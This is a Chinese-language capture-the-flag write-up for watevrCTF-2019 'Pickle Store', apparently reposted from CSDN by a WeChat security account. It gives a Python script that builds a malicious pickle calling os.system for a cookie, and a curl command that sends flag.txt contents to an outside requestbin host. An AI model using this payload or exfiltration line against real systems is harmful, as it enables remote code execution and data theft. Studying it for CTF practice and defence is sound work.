[watevrCTF-2019]Pickle Store pickle-解题步骤详解

题目介绍

要有1000美元买flag，然后我们查看header，扫目录之类的操作，最后在cookie中发现问题~~

gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu

先试试base64解码~~

可以看见有些关键词还是很明显的，要么是经过某种加密，或者处理~~

根据题目pickle的提示，我们用python的pickle库去loads一下~~

我开始以为是要伪造cookie，让money变成1000以上就能购买flag了，但是pickle有key加密处理，这种加密方式为hmac，尝试过爆破，无果~~

最后在网上看见了pickle的反序列化的漏洞~~

exp

import _pickle as cPickleimport sysimport base64
COMMAND = sys.argv[1]
class PickleRce(object):    def __reduce__(self):        import os        return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))

这段代码就是我们的exp

执行方式为

python3 script.py 命令

windows和linux的运行方式不一样，由于服务器实在linux上，所以我们也必须在linux上运行这段代码~~

然后替换cookie，虽然会报500错误，但是命令还是执行了，我们找个vps，直接把数据带出来就行了

python3 posix.py "curl http://http.requestbin.buuoj.cn/1fl5yzt1?a=`cat flag.txt |base64`"

相关总结

python序列化还有一个库叫做marshal，也存在相关漏洞~~

有时后pickle时，题目会以黑名单限制，这个时候我们可以用map绕过~~

原文来自CSDN博主「HyyMbb」｜侵删

中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商，也是能源互联网安全专家。

为方便大家沟通，中电运行开通“中电运行交流群”，诚挚欢迎能源企业和相关人士，以及对网络安全感兴趣的群体加入本群，真诚交流，互相学习。想加入我们就给我们留言吧。

●小白必读！寰宇卫士手把手教你栈溢出（上）

●手把手教你栈溢出（中）

●手把手教你栈溢出（下）

●《信息安全知识》之法律关键常识汇总

●CTF经验分享|带你入门带你飞！

原文始发于微信公众号（寰宇卫士）：[watevrCTF-2019]Pickle Store pickle-解题步骤详解